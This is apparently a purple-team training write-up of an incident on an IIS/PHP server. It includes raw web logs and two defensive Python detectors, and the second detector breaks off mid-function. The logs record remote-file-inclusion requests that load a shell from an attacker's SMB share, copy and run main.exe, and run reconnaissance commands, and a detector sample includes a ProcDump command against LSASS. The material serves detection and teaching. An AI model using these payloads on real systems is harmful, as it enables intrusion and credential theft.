Purple Lab
On Job Training
Last updated
Alert about a shell being spawned on host PL-SERVER2:
Tracing back through the older alerts, I found that from 27/08/2024 at 09:27:50 alerts started appearing about w3wp.exe running PHP through php-cgi.exe (the PHP FastCGI binary). EDR alert times are local; IIS writes its W3C logs in UTC by default, so, assuming a UTC+7 clock, 09:27:50 corresponds to about 02:27 in the log below, a minute before the first cmd= request at 02:28:51.
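The alert above is, in effect, a process-ancestry rule. As an added example (not the EDR's own rule and not part of the original investigation), here is that check run over constructed Sysmon-style process-creation events shaped after the chain on this page, w3wp.exe -> php-cgi.exe -> cmd.exe -> C:\Windows\Temp\main.exe, plus the later ProcDump of LSASS. The pid values and the C:\PHP\php-cgi.exe path are assumptions; pid 5100 is a deliberately benign cmd.exe that must not be flagged.

```python
"""Process-ancestry detection for the chain described in the alert above.

Added example for this write-up, not the EDR's own rule. The records are
constructed Sysmon-style process-creation events (ProcessId, ParentProcessId,
Image, CommandLine) shaped after w3wp.exe -> php-cgi.exe -> cmd.exe -> main.exe
and the later ProcDump of LSASS; paths such as C:\\PHP\\php-cgi.exe are assumed.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed events; pid 5100 is a benign cmd.exe not descended from the web server.
EVENTS = [
    Proc(4, 0, "System", ""),
    Proc(700, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    Proc(2352, 700, r"C:\Windows\System32\inetsrv\w3wp.exe", 'w3wp.exe -ap "DefaultAppPool"'),
    Proc(3100, 2352, r"C:\PHP\php-cgi.exe", "php-cgi.exe"),
    Proc(3188, 3100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig"),
    Proc(3190, 3188, r"C:\Windows\System32\ipconfig.exe", "ipconfig"),
    Proc(3402, 3100, r"C:\Windows\System32\cmd.exe", r"cmd /c C:\Windows\Temp\main.exe"),
    Proc(3410, 3402, r"C:\Windows\Temp\main.exe", r"C:\Windows\Temp\main.exe"),
    Proc(3520, 3410, r"C:\Windows\System32\cmd.exe", "cmd.exe /c tasklist"),
    Proc(3600, 3410, r"C:\Windows\Temp\procdump.exe", "procdump.exe -accepteula -ma lsass.exe lsass.dmp"),
    Proc(5000, 700, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    Proc(5100, 5000, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

WEB_WORKERS = {"w3wp.exe"}                                   # IIS worker process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TEMP_RE = re.compile(r"\\windows\\temp\\|\\appdata\\local\\temp\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(procs, pid, max_depth=64):
    """Process records from pid up to the root (pid first); guards against ppid cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def detect(events):
    """Return (rule, pid, chain) tuples for suspicious processes."""
    procs = {e.pid: e for e in events}      # pid reuse is ignored in this toy index
    findings = []
    for e in events:
        chain = ancestry(procs, e.pid)
        names = [basename(p.image) for p in chain]
        path = " <- ".join(names)
        descends_from_web = any(n in WEB_WORKERS for n in names[1:])
        if descends_from_web and names[0] in SHELLS:
            findings.append(("webshell_shell", e.pid, path))          # web worker spawning a shell
        if descends_from_web and TEMP_RE.search(e.image):
            findings.append(("webshell_temp_exec", e.pid, path))      # dropped binary run from Temp
        if names[0].startswith("procdump") and "lsass" in e.cmdline.lower():
            findings.append(("lsass_dump", e.pid, path))              # credential dump via ProcDump
    return findings


if __name__ == "__main__":
    for rule, pid, path in detect(EVENTS):
        print(f"{rule:20} pid={pid:<6} {path}")
```

The ancestry walk, not just the direct parent, is what matters here: once main.exe is running, its children (tasklist, procdump) have cmd.exe or main.exe as parent, and only a rule that looks further up the tree still ties them to w3wp.exe. On a real host the better signal for the LSASS dump is Sysmon Event ID 10 (process access to lsass.exe), which this process-creation-only example does not model.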
Files currently present on the server:
I went to C:\inetpub\logs\LogFiles\W3SVC1 and pulled the logs for the nearby days that were available: 22, 27, 28 and 30 August.
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-22 04:55:04
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-22 04:55:04 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 597
2024-08-22 04:55:14 192.168.30.172 GET /uploads/res.txt - 80 - 192.168.30.73 curl/7.55.1 - 200 0 0 6
2024-08-22 04:57:33 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 128
2024-08-22 04:57:34 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 38
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-22 10:19:13
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-22 10:19:13 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 507
2024-08-22 10:19:24 192.168.30.172 GET /uploads/res.txt - 80 - 192.168.30.73 curl/7.55.1 - 200 0 0 155
2024-08-22 10:20:08 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 140
2024-08-22 10:20:10 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 48
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-22 11:16:31
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-22 11:16:31 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 583
2024-08-22 11:16:42 192.168.30.172 GET /uploads/res.txt - 80 - 192.168.30.73 curl/7.55.1 - 200 0 0 5
2024-08-22 11:17:31 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 152
2024-08-22 11:17:32 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 43
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 02:22:12
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 02:22:12 ::1 GET /index.php - 80 - ::1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 - 200 0 0 290
2024-08-27 02:22:12 ::1 GET /favicon.ico - 80 - ::1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 http://localhost/index.php 404 0 2 22
2024-08-27 02:24:47 10.10.0.92 GET /vul - 80 - 10.10.0.92 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 - 404 0 2 339
2024-08-27 02:24:47 10.10.0.92 GET /favicon.ico - 80 - 10.10.0.92 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 http://10.10.0.92/vul 404 0 2 1
2024-08-27 02:24:51 10.10.0.92 GET /vul.php - 80 - 10.10.0.92 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 - 200 0 0 9
2024-08-27 02:26:18 10.10.0.92 GET /favicon.ico - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 http://10.10.0.92/vul.php 404 0 2 33
2024-08-27 02:26:32 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 9
2024-08-27 02:26:44 10.10.0.92 GET /vul.php page=hello 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 8
2024-08-27 02:28:32 10.10.0.92 GET /vul.php page=hello 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 14
2024-08-27 02:28:51 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 239
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 03:08:06
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 03:08:06 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 247
2024-08-27 03:08:41 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 5
2024-08-27 03:09:51 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 16
2024-08-27 03:16:14 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=id 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 307
2024-08-27 03:16:24 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=whoami 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 195
2024-08-27 03:19:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=whoami 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 261
2024-08-27 03:20:49 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig /all 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 208
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 04:10:49
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 04:10:49 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=tasklist 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 766
2024-08-27 04:11:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=tasklist -svc 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 432
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 08:14:59
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 08:14:59 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\main.exe C:\Windows\temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 732
2024-08-27 08:16:19 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_operations.py C:\Windows\temp\client_operations.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 278
2024-08-27 08:17:31 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_connection.py C:\Windows\temp\client_connection.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 279
2024-08-27 08:22:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd.exe -c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 76895
2024-08-27 08:25:46 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105026
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 03:32:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 03:32:21 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 472
2024-08-28 03:33:32 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 213
2024-08-28 03:33:54 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 192
2024-08-28 03:34:25 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 232
2024-08-28 03:36:00 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_connection.py C:\Windows\temp\client_connection.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 329
2024-08-28 03:36:11 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 213
2024-08-28 03:37:41 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\main.exe C:\Windows\temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 501
2024-08-28 03:39:21 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 96192
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 03:54:49
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 03:54:49 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105027
2024-08-28 04:02:54 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 39638
2024-08-28 04:03:40 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 39539
2024-08-28 04:05:09 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 84633
2024-08-28 04:06:57 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 1751
2024-08-28 04:09:15 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 73315
2024-08-28 04:14:10 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 64 105014
2024-08-28 04:16:09 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105012
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 04:38:13
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 04:38:13 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 447
2024-08-28 04:38:30 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 177
2024-08-28 04:47:23 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 296
2024-08-28 04:48:52 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\main.exe C:\Windows\temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 504
2024-08-28 04:49:00 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_operations.py C:\Windows\temp\client_operations.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 294
2024-08-28 04:49:08 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_connection.py C:\Windows\temp\client_connection.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 262
2024-08-28 04:50:53 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 89502
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 06:56:35
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 06:56:35 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 9998
2024-08-28 06:59:01 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 80059
2024-08-28 07:01:05 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 74547
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 07:17:52
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 07:17:52 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 10969
2024-08-28 07:19:03 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 42691
2024-08-28 07:19:27 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 21084
2024-08-28 07:22:34 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 44347
2024-08-28 07:23:55 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 64363
2024-08-28 07:25:51 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 93764
2024-08-28 07:31:17 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 6051
2024-08-28 07:32:56 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 77433
2024-08-28 07:40:00 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105021
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 10:00:33
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 10:00:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105179
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-30 07:19:37
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-30 07:19:37 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105199
Reading the entries against the #Fields header: the third column is s-ip, the server's own address, and the ninth is c-ip, the client. So 10.10.0.92 is PL-SERVER2 itself and the attacker is 10.10.0.95, the same host that serves shell.txt over SMB (\\10.10.0.95\share) for the include and that main.exe later connects back to. Two details in the 27/08 log stand out: the first hits on /vul and /vul.php at 02:24 come from 10.10.0.92 itself with a Chrome user agent (c-ip equal to s-ip, two minutes after the ::1 localhost requests to /index.php), so vul.php was first exercised from a session on the server; the attacker's Firefox/115 requests from 10.10.0.95 start at 02:26, and the first command execution (page=\\10.10.0.95\share\shell.txt&cmd=ipconfig) is at 02:28:51.
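As an added example, not part of the original investigation: a small parser for the W3C format above that maps columns by the #Fields header (so s-ip and c-ip cannot be mixed up), flags requests whose query carries a UNC or URL include target or a command parameter, and summarises the attacker-side indicators. The sample log is constructed in IIS's raw on-disk form (spaces inside a field written as '+', query string still URL-encoded; the lines quoted above had already been decoded by the viewer), modelled on the entries above plus one http:// include to show the URL-wrapper variant of the same attack.

```python
"""Flag remote-file-inclusion and command-parameter abuse in IIS W3C logs.

Added example for this write-up, not part of the original investigation.
On disk IIS replaces spaces inside a field with '+' and leaves the query
string URL-encoded, so the constructed sample below is in that raw form
(the lines quoted in the write-up had already been decoded by the viewer).
"""
import re
from urllib.parse import parse_qsl

# Constructed sample modelled on the W3SVC1 log above; the http:// line is an
# added variant to show the URL-wrapper form of the same attack.
SAMPLE_LOG = r"""
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 02:22:12
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 02:24:51 10.10.0.92 GET /vul.php - 80 - 10.10.0.92 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64) - 200 0 0 9
2024-08-27 02:26:44 10.10.0.92 GET /vul.php page=hello 80 - 10.10.0.95 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 8
2024-08-27 02:28:51 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig 80 - 10.10.0.95 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 239
2024-08-27 08:25:46 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd%20/c%20C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0+(X11;+Linux+x86_64) - 500 0 258 105026
2024-08-27 09:00:00 10.10.0.92 GET /vul.php page=http://10.10.0.95/shell.txt 80 - 10.10.0.95 curl/8.5.0 - 200 0 0 12
"""

UNC_RE = re.compile(r"^\\\\[^\\]+\\")                             # \\host\share\...
URL_RE = re.compile(r"^(?:https?|ftp|php|data|expect)://", re.I)  # stream-wrapper RFI
CMD_PARAMS = {"cmd", "c", "command", "exec"}                       # parameter names worth pulling out


def parse_w3c(text):
    """Return one dict per request line, keyed by the names in the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # the field list can change between log files
            continue
        if line.startswith("#"):
            continue                       # #Software / #Version / #Date directives
        if fields is None:
            raise ValueError("request line seen before any #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue                       # truncated line: skip instead of misaligning columns
        records.append(dict(zip(fields, values)))
    return records


def payload_host(include):
    """Host an included UNC path or URL points at, for scoping attacker infrastructure."""
    if UNC_RE.match(include):
        return include.split("\\")[2]
    return include.split("://", 1)[1].split("/")[0]


def find_rfi(records):
    """Requests whose query carries a remote include target and/or a command parameter."""
    findings = []
    for rec in records:
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        include = command = None
        for name, value in parse_qsl(query, keep_blank_values=True):   # decodes %20 and '+'
            if UNC_RE.match(value) or URL_RE.match(value):
                include = value
            if name.lower() in CMD_PARAMS:
                command = value
        if include or command:
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "s_ip": rec["s-ip"],          # the web server itself
                "c_ip": rec["c-ip"],          # the requester: this is the attacker address
                "include": include,
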